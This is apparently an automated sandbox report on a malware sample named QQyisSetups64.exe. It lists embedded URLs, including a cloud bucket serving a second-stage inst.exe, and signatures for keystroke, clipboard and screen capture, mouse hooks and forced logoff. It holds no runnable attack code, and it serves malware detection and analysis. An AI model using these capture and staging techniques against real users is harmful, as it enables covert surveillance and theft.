                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
                          Source: sites.dll.15.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                          Source: sites.dll.15.drString found in binary or memory: http://sf.symcb.com/sf.crl0a
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://sf.symcb.com/sf.crl0f
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: http://sf.symcb.com/sf.crt0
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: http://sf.symcd.com0&
                          Source: inst.exeString found in binary or memory: http://sfdw.360safe.com/safesetup_2000.exe
                          Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://sfdw.360safe.com/safesetup_2000.exe360
                          Source: inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://sfdw.360safe.com/setup.exe.exe
                          Source: inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://sfdw.360safe.com/setupbeta.exe4(u7b4N
                          Source: inst.exeString found in binary or memory: http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cab
                          Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh
                          Source: inst.exeString found in binary or memory: http://sfdw.360safe.com/superkiller/superkillerexe_ce61817f687d599de13ee9deb1af83e2_5.1.0.1181.cab
                          Source: sites.dll.15.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: http://sv.symcd.com0&
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                          Source: inst.exeString found in binary or memory: http://wpad.%s/wpad.dat
                          Source: inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://wpad.%s/wpad.dathttp://%s/wpad.datwpad
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: http://www.360.cn
                          Source: inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://www.360.cn/
                          Source: inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: http://www.360.cn//index.html127.0.0.1--
                          Source: inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: http://www.360.cn/xukexieyi.html#360
                          Source: powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: http://www.symauth.com/cps0(
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: http://www.symauth.com/rpa00
                          Source: powershell.exe, 0000000C.00000002.1427177445.0000000004C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1403379850.0000000004D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1403379850.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C12000.00000004.00000020.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1456369398.0000000000400000.00000040.00000001.01000000.00000004.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C9F000.00000004.00000020.00020000.00000000.sdmp, QQyisSetups64.exe, 00000006.00000002.2556409168.000000000019D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe.
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exea
                          Source: QQyisSetups64.exe, 00000003.00000002.1456312362.000000000019A000.00000004.00000010.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1456369398.0000000000400000.00000040.00000001.01000000.00000004.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp, QQyisSetups64.exe, 00000006.00000002.2556409168.000000000019D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exep
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeq
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/l
                          Source: inst.exeString found in binary or memory: https://bbs.360.cn/thread-16079507-1-1.html
                          Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: https://bbs.360.cn/thread-16079507-1-1.htmlD
                          Source: powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: https://d.symcb.com/cps0%
                          Source: 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: https://d.symcb.com/rpa0
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drString found in binary or memory: https://d.symcb.com/rpa0.
                          Source: qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                          Source: svchost.exe, 00000012.00000003.1512607145.000002945EFB0000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                          Source: powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 0000000C.00000002.1427177445.0000000005363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                          Source: inst.exeString found in binary or memory: https://hao.360.cn
                          Source: inst.exeString found in binary or memory: https://hao.360.cn/
                          Source: inst.exeString found in binary or memory: https://hao.360.cn/?installer
                          Source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drString found in binary or memory: https://hao.360.cn/?installerhttps://hao.360.cnhttps://http://https://hao.360.cn/%s
                          Source: inst.exe, 0000000F.00000002.2559394305.000000000081F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: powershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: qmgr.db.18.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drString found in binary or memory: https://sectigo.com/CPS0
                          Source: QQyisSetups64.exe, 00000003.00000002.1461469475.000000000363B000.00000004.00000010.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, inst.exe.3.dr, 360P2SP.dll.15.dr, inst[1].exe.3.dr, sites.dll.15.drString found in binary or memory: https://www.globalsign.com/repository/0
                          Source: inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drString found in binary or memory: https://www.globalsign.com/repository/03
                          Source: sites.dll.15.drString found in binary or memory: https://www.globalsign.com/repository/06
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drString found in binary or memory: https://www.incredibuild.com
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                          Source: unknownHTTPS traffic detected: 47.79.48.211:443 -> 192.168.2.7:49708 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: [esc]6_2_0378E850
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: [esc]6_2_0378E850
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: [esc]6_2_0378E850
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: [esc]6_2_0378E850
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0378E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,6_2_0378E850
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0378E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,6_2_0378E850
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0378BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,6_2_0378BC70
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C60F664 GetAsyncKeyState,15_2_6C60F664
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0378E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,6_2_0378E4F0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C633544 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,IntersectRect,IntersectRect,15_2_6C633544
                          Source: Yara matchFile source: QQyisSetups64.exe, type: SAMPLE
                          Source: Yara matchFile source: 3.0.QQyisSetups64.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000000.1279423862.00000000006F9000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: QQyisSetups64.exe PID: 7736, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe, type: DROPPED

                          E-Banking Fraud

                          barindex
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW, Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads15_2_00AC8A46
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW, Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads16_2_00AC8A46

                          Operating System Destruction

                          barindex
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeProcess information set: 01 00 00 00 Jump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_02861A37 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W,3_2_02861A37
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_02861087 NtdllDefWindowProc_W,3_2_02861087
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AE42DE: __EH_prolog3,GetDriveTypeW,_memset,QueryDosDeviceW,_wcslen,__wcsnicmp,CreateFileW,DeviceIoControl,CloseHandle,CloseHandle,15_2_00AE42DE
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0378B463 ExitWindowsEx,6_2_0378B463
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0378B43F ExitWindowsEx,6_2_0378B43F
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0378B41B ExitWindowsEx,6_2_0378B41B
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_10010F103_2_10010F10
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_028600323_2_02860032
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_02870EE73_2_02870EE7
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03786EE06_2_03786EE0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03786C506_2_03786C50
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0379E3416_2_0379E341
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_037983816_2_03798381
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0379EA1D6_2_0379EA1D
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_037889006_2_03788900
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0379F9FF6_2_0379F9FF
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0379D89F6_2_0379D89F
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0379DDF06_2_0379DDF0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_037824B06_2_037824B0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02C9122F6_2_02C9122F
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02C91E5C6_2_02C91E5C
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02C8B66A6_2_02C8B66A
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02C917806_2_02C91780
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02C90CDE6_2_02C90CDE
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02C824B06_2_02C824B0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02C92D916_2_02C92D91
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_028800326_2_02880032
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_028912066_2_02891206
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0288B6416_2_0288B641
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_028917576_2_02891757
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_028824876_2_02882487
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02890CB56_2_02890CB5
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02892D686_2_02892D68
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0361F3BE6_2_0361F3BE
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0361D25E6_2_0361D25E
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_036082BF6_2_036082BF
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0360689F6_2_0360689F
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0361D7AF6_2_0361D7AF
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03601E6F6_2_03601E6F
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0360660F6_2_0360660F
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03617D406_2_03617D40
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0361DD006_2_0361DD00
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AA924515_2_00AA9245
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AC592D15_2_00AC592D
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00ACE94515_2_00ACE945
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AFC8E015_2_00AFC8E0
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A90F0415_2_00A90F04
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A9128115_2_00A91281
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A8296015_2_00A82960
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A7AA0015_2_00A7AA00
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AAAB3315_2_00AAAB33
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A730C015_2_00A730C0
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A771F015_2_00A771F0
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AE729C15_2_00AE729C
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A774F015_2_00A774F0
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00B039CB15_2_00B039CB
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AF397015_2_00AF3970
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A7FF0015_2_00A7FF00
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A7FF7015_2_00A7FF70
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C6AACAF15_2_6C6AACAF
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C69E99415_2_6C69E994
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C68EBC415_2_6C68EBC4
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C69E45E15_2_6C69E45E
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C6AA5B715_2_6C6AA5B7
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C6A266A15_2_6C6A266A
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C66BD5215_2_6C66BD52
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C67F9F915_2_6C67F9F9
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C697BC315_2_6C697BC3
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C633B8715_2_6C633B87
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C67378715_2_6C673787
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C6A8E5115_2_6C6A8E51
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C5D488015_2_6C5D4880
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C680A6E15_2_6C680A6E
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C5D4B4015_2_6C5D4B40
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C6A0B5815_2_6C6A0B58
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AFC8E016_2_00AFC8E0
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A8296016_2_00A82960
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A7AA0016_2_00A7AA00
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AAAB3316_2_00AAAB33
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A90F0416_2_00A90F04
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A730C016_2_00A730C0
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A7B05016_2_00A7B050
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A771F016_2_00A771F0
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A9128116_2_00A91281
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AE729C16_2_00AE729C
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AA924516_2_00AA9245
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00A774F016_2_00A774F0
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00B039CB16_2_00B039CB
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AC592D16_2_00AC592D
